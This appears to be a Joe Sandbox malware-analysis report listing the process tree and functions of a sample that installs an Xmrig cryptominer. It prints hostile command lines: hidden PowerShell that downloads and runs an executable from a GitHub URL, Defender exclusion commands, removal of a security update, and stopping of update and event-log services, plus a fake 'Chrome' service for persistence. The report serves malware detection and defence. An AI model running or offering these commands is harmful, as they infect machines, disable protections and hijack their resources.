Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	08:02:18
Start date:	08/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe', 'C:\Users\user\AppData\Local\Temp\1348.exe')"
Imagebase:	0x7ff760310000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	08:02:34
Start date:	08/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\1348.exe'"
Imagebase:	0x7ff760310000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	08:02:35
Start date:	08/10/2024
Path:	C:\Users\user\AppData\Local\Temp\1348.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1348.exe"
Imagebase:	0x7ff795d50000
File size:	5'288'736 bytes
MD5 hash:	1A67A432E7AB0BCD2189F3F4142F2AE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 76%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	08:02:35
Start date:	08/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Imagebase:	0x7ff760310000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	08:02:35
Start date:	08/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	08:02:39
Start date:	08/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff716550000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	08:02:39
Start date:	08/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop UsoSvc
Imagebase:	0x7ff67f960000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	08:02:39
Start date:	08/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	08:02:39
Start date:	08/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	08:02:39
Start date:	08/10/2024
Path:	C:\Windows\System32\wusa.exe
Wow64 process (32bit):	false
Commandline:	wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff66e720000
File size:	345'088 bytes
MD5 hash:	FBDA2B8987895780375FE0E6254F6198
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	08:02:39
Start date:	08/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop WaaSMedicSvc
Imagebase:	0x7ff67f960000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	08:02:39
Start date:	08/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	08:02:39
Start date:	08/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop wuauserv
Imagebase:	0x7ff67f960000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	08:02:39
Start date:	08/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	08:02:39
Start date:	08/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop bits
Imagebase:	0x7ff67f960000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	08:02:39
Start date:	08/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	08:02:39
Start date:	08/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop dosvc
Imagebase:	0x7ff67f960000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	08:02:39
Start date:	08/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	08:02:39
Start date:	08/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe delete "Chrome"
Imagebase:	0x7ff67f960000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	08:02:39
Start date:	08/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	08:02:39
Start date:	08/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe create "Chrome" binpath= "C:\ProgramData\Chrome.exe" start= "auto"
Imagebase:	0x7ff67f960000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	08:02:39
Start date:	08/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	08:02:40
Start date:	08/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop eventlog
Imagebase:	0x7ff67f960000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	08:02:40
Start date:	08/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe start "Chrome"
Imagebase:	0x7ff67f960000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	08:02:40
Start date:	08/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	08:02:40
Start date:	08/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6fab70000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	08:02:40
Start date:	08/10/2024
Path:	C:\ProgramData\Chrome.exe
Wow64 process (32bit):	false
Commandline:	C:\ProgramData\Chrome.exe
Imagebase:	0x7ff795bf0000
File size:	5'288'736 bytes
MD5 hash:	1A67A432E7AB0BCD2189F3F4142F2AE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 76%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	08:02:41
Start date:	08/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Imagebase:	0x7ff760310000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 6168, Parent PID: 6156

General

Target ID:	33
Start time:	08:02:41
Start date:	08/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	08:02:43
Start date:	08/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff716550000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: sc.exePID: 6848, Parent PID: 1868

General

Target ID:	35
Start time:	08:02:43
Start date:	08/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop UsoSvc
Imagebase:	0x7ff67f960000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	08:02:43
Start date:	08/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	08:02:43
Start date:	08/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	08:02:43
Start date:	08/10/2024
Path:	C:\Windows\System32\wusa.exe
Wow64 process (32bit):	false
Commandline:	wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff66e720000
File size:	345'088 bytes
MD5 hash:	FBDA2B8987895780375FE0E6254F6198
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	08:02:43
Start date:	08/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop WaaSMedicSvc
Imagebase:	0x7ff67f960000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	08:02:43
Start date:	08/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	08:02:43
Start date:	08/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop wuauserv
Imagebase:	0x7ff67f960000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	08:02:43
Start date:	08/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	08:02:43
Start date:	08/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop bits
Imagebase:	0x7ff67f960000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	08:02:43
Start date:	08/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	08:02:43
Start date:	08/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop dosvc
Imagebase:	0x7ff67f960000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	08:02:43
Start date:	08/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	08:02:43
Start date:	08/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	48
Start time:	08:02:43
Start date:	08/10/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	explorer.exe
Imagebase:	0x7ff633410000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000030.00000002.3883473014.00000000008DF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Function 00007FF8880E076E Relevance: 1.6, Strings: 1, Instructions: 323COMMON

Download Yara Rule

Strings

bJ, xrefs: 00007FF8880E0832

Memory Dump Source

Source File: 00000003.00000002.1569823203.00007FF8880E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8880E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8880e0000_powershell.jbxd

Similarity

API ID:
String ID: bJ
API String ID: 0-3573994042
Opcode ID: 52da744defe643a5fc485fc4efb89a64691391b64253502f0c0267a2e7605424
Instruction ID: 44a04ba9aaa896c59148536c2fbbebbeaaff6f9dcf4d5185ce2d91273df47929
Opcode Fuzzy Hash: 52da744defe643a5fc485fc4efb89a64691391b64253502f0c0267a2e7605424
Instruction Fuzzy Hash: 9D911822E1DA8A4FFB59966858561BA37D1FF562A0F1800BFD44DC31D3DE2DAC05C385

Function 00007FF8880E08C6 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1569823203.00007FF8880E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8880E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8880e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee9e918e0fe45d066cacc097d723c46a024cb0ed5213d9aa185e0c4cf67b0830
Instruction ID: 6abdec18de1a92d1215ee3d06e636595e15f14931ae9186c9cf4aa53cb198fb7
Opcode Fuzzy Hash: ee9e918e0fe45d066cacc097d723c46a024cb0ed5213d9aa185e0c4cf67b0830
Instruction Fuzzy Hash: 4421C022E1EA4B4FFF999A6854912BA76D1FF412A0F6800BED04DC34D3DE2DA844C249

Function 00007FF8880133B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1569446851.00007FF888010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff888010000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction ID: 716299687465549df30901e2fa383faae190dd07c2821402761980b7b28b6e4f
Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction Fuzzy Hash: 5401677111CB0D8FDB48EF0CE451AA5B7E0FB95364F10056EE58AC3695DB36E882CB46

Non-executed Functions

Function 00007FF88801044D Relevance: 5.1, Strings: 4, Instructions: 120COMMON

Download Yara Rule

Strings

/#, xrefs: 00007FF888010469
8,#, xrefs: 00007FF8880104B1
(0#, xrefs: 00007FF8880104D1
p0#, xrefs: 00007FF888010491

Memory Dump Source

Source File: 00000003.00000002.1569446851.00007FF888010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff888010000_powershell.jbxd

Similarity

API ID:
String ID: (0#$8,#$p0#$/#
API String ID: 0-2389384893
Opcode ID: ce58813d26f051af2cee783f59ce23d49ea4231d9cfa95d16038522f489976f3
Instruction ID: 4bcd50fe5a22f9f40698a4e362a9da10cccc690be672e0893f6ff53600378554
Opcode Fuzzy Hash: ce58813d26f051af2cee783f59ce23d49ea4231d9cfa95d16038522f489976f3
Instruction Fuzzy Hash: E941A3ABD0E6C28FE71686781CA60797F61BF136A0B1D40FBC0C8CA4E7D6189945C35A

Analysis Process: 1348.exePID: 6592, Parent PID: 6584COMMON

Executed Functions

Function 00007FF795D51140 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1636895627.00007FF795D51000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF795D50000, based on PE: true

Associated: 00000006.00000002.1636874226.00007FF795D50000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1636945884.00007FF795D5B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1636977671.00007FF795D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1637025820.00007FF795D5F000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1637454712.00007FF796257000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1637479415.00007FF796259000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1637511631.00007FF79625C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff795d50000_1348.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09aa500106249f898c70f176d5dd8b6a7b84f69ff7d021052aa52de95c06f874
Instruction ID: da6d8820999f4ec56652ffaddc9bb483b51a777129aa6414c339ab7015a7951b
Opcode Fuzzy Hash: 09aa500106249f898c70f176d5dd8b6a7b84f69ff7d021052aa52de95c06f874
Instruction Fuzzy Hash: 2EB0922090521984E2103B65D881269A2A06B09B41F802030C41D02356CA6D50824B20

Analysis Process: Chrome.exePID: 1868, Parent PID: 632COMMON

Executed Functions

Function 00007FF795BF1140 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.1670466585.00007FF795BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF795BF0000, based on PE: true

Associated: 0000001F.00000002.1670443903.00007FF795BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001F.00000002.1670491435.00007FF795BFB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001F.00000002.1670514216.00007FF795BFE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001F.00000002.1670754139.00007FF795E80000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001F.00000002.1670984779.00007FF7960F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001F.00000002.1671020363.00007FF7960F9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001F.00000002.1671047503.00007FF7960FC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff795bf0000_Chrome.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09aa500106249f898c70f176d5dd8b6a7b84f69ff7d021052aa52de95c06f874
Instruction ID: 9a285e3f7474fff9f5579c1b095aa83190b89df5a76ccabc7675156961780b13
Opcode Fuzzy Hash: 09aa500106249f898c70f176d5dd8b6a7b84f69ff7d021052aa52de95c06f874
Instruction Fuzzy Hash: 3AB0922090421984E2113B21D84226876A06B08B40F900420C80C02352CA6E50404B20

Analysis Process: conhost.exePID: 1404, Parent PID: 1868COMMON

Execution Graph

Execution Coverage:	2.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	13.6%
Total number of Nodes:	897
Total number of Limit Nodes:	2

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0000000140001394 Relevance: 1.5, APIs: 1, Instructions: 24
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDelayExecution.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7

Memory Dump Source

Source File: 0000002F.00000002.3883472118.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000002F.00000002.3883446602.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3883494695.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3883515683.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002F.00000002.3883531158.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_140000000_conhost.jbxd

Similarity

API ID: DelayExecution
String ID:
API String ID: 1249177460-0
Opcode ID: a9efc844cea4936be805583ba1432efd4cb6cf176723f88e4930ad65a1e23134
Instruction ID: 55769af2d4bf97badd1df828a245d3095576d73c2821e0f357dacb6e1e8aabda
Opcode Fuzzy Hash: a9efc844cea4936be805583ba1432efd4cb6cf176723f88e4930ad65a1e23134
Instruction Fuzzy Hash: 6EF09DB6608B408AEA12DB62F85179A77A1F79D7C0F009919BBC853739DB38C190CB40

Non-executed Functions

Function 0000000140003240 Relevance: 149.0, APIs: 60, Strings: 24, Instructions: 2020COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 0000000140003381
memset.MSVCRT ref: 00000001400034AD
wcslen.MSVCRT ref: 0000000140003516
_wcsnicmp.MSVCRT ref: 0000000140003549
wcslen.MSVCRT ref: 0000000140003559
wcscpy.MSVCRT ref: 000000014000363E
wcscat.MSVCRT ref: 000000014000364D
memset.MSVCRT ref: 000000014000365E
wcscpy.MSVCRT ref: 00000001400036C1
wcscat.MSVCRT ref: 00000001400036D0
memset.MSVCRT ref: 00000001400036E4

Strings

ProviderName, xrefs: 0000000140003F61
\??\, xrefs: 0000000140004887
NVIDIA, xrefs: 00000001400043E7
\BaseNamedObjects\zvephrvenfzrpfqs, xrefs: 0000000140004A64
Start, xrefs: 0000000140005B37
\??\, xrefs: 0000000140004633
ImagePath, xrefs: 0000000140004EAA
ATI, xrefs: 000000014000448F
